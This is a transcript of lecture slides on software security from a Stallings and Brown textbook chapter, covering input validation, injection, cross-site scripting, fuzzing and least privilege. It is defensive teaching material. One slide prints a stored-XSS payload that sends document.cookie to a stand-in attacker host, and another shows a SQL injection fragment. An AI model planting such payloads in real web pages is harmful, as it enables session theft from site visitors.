Computer Security: Principles and Practice, 1/e

Download Report

Transcript Computer Security: Principles and Practice, 1/e

Computer Security: Principles
and Practice
Chapter 11 –Software Security
by William Stallings and Lawrie Brown
Lecture slides by Lawrie Brown
1
Software Security
• many vulnerabilities result from poor programming
practices
– e.g., OWASP Top Ten list includes 5 related to insecure
software code: un-validated input, cross-site scripting,
buffer overflow, injection flaws, improper error handling
• often from insufficient checking / validation of
program input
• awareness of issues is critical
2
Software Quality vs Security
• software quality and reliability
– accidental failure of program
– from theoretically random unanticipated input
– improve using structured design and testing
– not how many bugs, but how often triggered in
general use
• software security is related
– but attacker chooses input distribution, specifically
targeting buggy code to exploit
– triggered by often very unlikely inputs
– which common tests don’t identify
3
Defensive Programming
• a form of defensive design to ensure continued
function of software despite unforeseen usage
• requires attention to all aspects of program
execution, environment, data processed
• also called secure programming
• assume nothing, check all potential errors
• rather than just focusing on solving task
• must validate all assumptions
• a positive development
4
Abstract View of Program
5
Handling Program Input
• incorrect handling is a very common failing
• input is any source of data from outside
– data read from keyboard, file, network
– also execution environment, configuration data
• must identify all data sources
• and explicitly validate assumptions on size and
type of values before use
6
Input Size & Buffer Overflow
• often have assumptions about buffer size
– eg. that user input is only a line of text
– size buffer accordingly but fail to verify size
– resulting in buffer overflow (see Ch 10)
• testing may not identify vulnerability
– since focus on “normal, expected” inputs
• safe coding treats all input as dangerous
– hence must process so as to protect program
7
Interpretation of Input
• program input may be binary or text
– binary interpretation depends on encoding and is
usually application specific
– text encoded in a character set e.g. ASCII
– internationalization has increased variety
– also need to validate interpretation before use
• e.g. filename, URL, email address, identifier
• failure to validate may result in an exploitable
vulnerability
8
Injection Attacks
• flaws relating to invalid input handling which
then influences program execution
– often when passed as a parameter to a helper
program or other utility or subsystem
• most often occurs in scripting languages
– encourage reuse of other programs / modules
– often seen in web CGI scripts, PHP, etc.
• Command injection, SQL injection, Code injection
9
A Perl CGI Command Injection Attack
10
Safety extension to Perl finger CGI script
• counter attack by validating input
– pattern matching to reject invalid input
– only allow alphanumeric characters in this example
11
SQL Injection
• another widely exploited injection attack
• when input used in SQL query to database
– SQL meta-characters are the concern
– must check and validate input for these
• e.g., PHP: prepends backslashes to the following
characters: \x00, \n, \r, \, ', " and \x1a.
• still needs to sanitize keyword before escape, e.g., id= 23 OR 1=1
12
Code Injection
• a third common variant
• input includes code that is then executed
– e.g., PHP remote code injection vulnerability
• variable + global field variables + remote include
– e.g., JavaScript code injection
13
JavaScript Security Model in Browsers
Web Browser
Sandbox
Sandbox
Same-origin
http://www.domainA.com:8080/pageA.htm
<script> JavaScript code in pageA </script>
http://www.domainB.com/pageB.htm
<script> JavaScript code in pageB </script>
Attacks often
breach these
two restrictions
14
14
Insecure JavaScript Inclusion

Top-level document: loaded from the URL in address bar
http://www.domainA.com/pageA.htm
Direct
Inclusion
<script type=“text/javascript” src=
“http://www.domainB.com/foo.js”>
</script>
http://www.domainA.com/pageA.htm
Indirect
Inclusion
http://www.domainA.com/frame.htm
<script type=“text/javascript” src=
“http://www.domainB.com/foo.js”>
</script>
Scripts in foo.js
inherit the origin
of pageA and
obtain maximum
permissions
They may be
malicious or
compromised!
prevalent: 4,517 homepages (out of 6805) include JavaScript files
from 1,985 external domains into their top-level documents
15
Insecure JavaScript Dynamic Generation
– Techniques to dynamically generate JavaScript
•
•
•
•
The eval() function
The document.write() method
The innerHTML property
DOM methods such as document.createElement()
– The first three techniques are more dangerous
• Scripts could be immediately executed
• Detecting malicious scripts is challenging
The eval() function calls appeared on about 3000 homepages (out of 6805);
they are misused or abused in 70% of the sampled cases (of 700 pages).
16
Cross Site Scripting Attacks
• malicious scripts are injected into a trusted (vulnerable)
website, and later executed on the browser of a user
• failed input/output validation, violate same origin policy
• non-persistent (or reflected) XSS
– the injected code is reflected off the web server to a user
– when a user clicks a malicious link or submit a malicious form
• persistent (or stored) XSS
– the injected code is permanently stored on the target server DB
• DOM-based XSS
– related to JavaScript dynamic generation
17
Persistent XSS Example
• e.g., guestbooks, wikis, blogs etc
• where user input includes script code
– e.g. to collect cookie details of viewing users
• need to validate data supplied
– including handling various possible encodings
• attacks both input and output handling
Thank s for this info rmati on, its great !
<scri pt>do cumen t.loc ation ='h ttp:/ /hack er.we b.sit e/coo kie.c gi?'+
docum ent.c ookie </scr ipt>
18
Validating Input Syntax
• to ensure input data meets assumptions
– e.g. is printable, HTML, email, userid etc
• compare to what is known acceptable
• not to known dangerous
– as can miss new problems, bypass methods, multiple encodings
• commonly use regular expressions
– pattern of characters describe allowable input
– details vary between languages
• bad input either rejected or altered
• validating numeric input
19
Input Fuzzing
• powerful testing method using a large range
of randomly generated inputs
– to test whether program/function correctly
handles abnormal inputs
– simple, free of assumptions, cheap
– assists with reliability as well as security
• can also use templates to generate classes of
known problem inputs
• could miss bugs for very specific input values
20
XSS Related Research Examples (1)
• “Cross site scripting prevention with dynamic data tainting and
static analysis”, Philipp Vogt et al., NDSS 2007
– tracking the flow of sensitive information inside the web browser. If sensitive
information is about to be transferred to a third party, the user can decide if
this should be permitted or not.
• “Defeating Script Injection Attacks with Browser-Enforced
Embedded Policies”, Trevor Jim, Nikhil Swamy, Michael Hicks,
WWW 2007
– browser is the ideal place to filter scripts. web site should supply the filtering
policy to the browser. Whitebox policy and DOM sandbox policy (noexecute
for rich content).
• “Reining in the Web with Content Security Policy”, Sid Stamm,
Brandon Sterne, Gervase Markham, WWW 2010
21
XSS Related Research Examples (2)
• “BLUEPRINT: Robust Prevention of Cross-site Scripting Attacks for
Existing Browsers”, Mike Ter Louw, V.N. Venkatakrishnan, S&P 2009
– browsers cannot be entrusted to make script identification decisions in
untrusted HTML due to their unreliable parsing behavior. Enables a web
application to creates the parse tree for untrusted content programmatically
using a small set of low-level Document Object Model (DOM) primitives.
• “Regular Expressions Considered Harmful in Client-Side XSS Filters”,
Daniel Bates, Adam Barth, and Collin Jackson, WWW’2010
– existing filters are unacceptably slow, easily circumvented, or could introduce
vulnerabilities. Instead of using regular expressions to simulate the HTML
parser, client-side XSS filters should integrate with the rendering pipeline and
examine the response after it has been parsed.
22
Writing Safe Program Code
• Correct algorithm implementation
– e.g., random number, SYN-ACK seq number, debug code
• Ensuring machine language corresponds to algorithm
– assume or ensure compiler/interpreter is correct, EAL 7
• Correct interpretation of data values
– strongly typed languages are safer
• Correct use of memory
– programmer may need to ensures correct
allocation/release
• Preventing race conditions with shared memory
– correctly use appropriate synchronization primitives
23
Interacting with O/S and other programs
• programs execute on systems under O/S
– mediates and shares access to resources
– constructs execution environment
• systems have multiple users
– with access permissions on resources / data
• programs may access shared resources
– race conditions, temporary files
• internal implementations of OS, hardware
– e.g., how to securely delete a file
• flow of Information between programs
24
Use of Least Privilege
• exploit of flaws may give attacker greater
privileges - privilege escalation
• hence run programs with least privilege
needed to complete their function
– determine suitable user and group to use
– whether grant extra user or group privileges
• latter preferred and safer, may not be sufficient
– ensure can only modify files/dirs needed
• otherwise compromise results in greater damage
• recheck these when moved or upgraded
25
Root/Admin Programs
• programs with root / administrator privileges
a major target of attackers
– since provide highest levels of system access
– are needed to manage access to protected system
resources, e.g. network server ports
• often privilege only needed at start
– can then run as normal user
• good design partitions complex programs in
smaller modules with needed privileges
26
Handling Program Output
• final concern is program output
– stored for future use, sent over net, displayed
– may be binary or text
• conforms to expected form / interpretation
– assumption of common origin
– e.g. XSS, VT100 escape seqs, X terminal hijack
• uses expected character set
• target not program but output display device
27
Content-Sniffing XSS and CSRF Related Research
• “Secure Content Sniffing for Web Browsers, or How to Stop Papers
from Reviewing Themselves”, Adam Barth et al., S&P 2009
– For compatibility, every Web browser employs a content sniffing algorithm
that inspects the contents of HTTP responses and occasionally overrides the
MIME type provided by the server. They suggest two design principles for a
secure content-sniffing algorithm: avoid privilege escalation, which protects
sites that limit the MIME types they use when serving malicious content, and
use prefix-disjoint signatures, which protects sites that filter uploads.
• “Robust Defenses for Cross-Site Request Forgery”, Adam Barth,
Collin Jackson, and John C. Mitchell CCS 2008
– presented login CSRF, analyzed limitations of existing approaches such as
HTTP Referer header, proposed that browsers implement the Origin header,
which provides the security benefits of the Referer header while responding
to privacy concerns.
28
Summary
• discussed software security issues
• handling program input safely
– size, interpretation, injection, XSS, fuzzing
• writing safe program code
– algorithm, machine language, data, memory
• interacting with O/S and other programs
– ENV, least privilege, syscalls / std libs, file lock,
temp files, other programs
• handling program output
29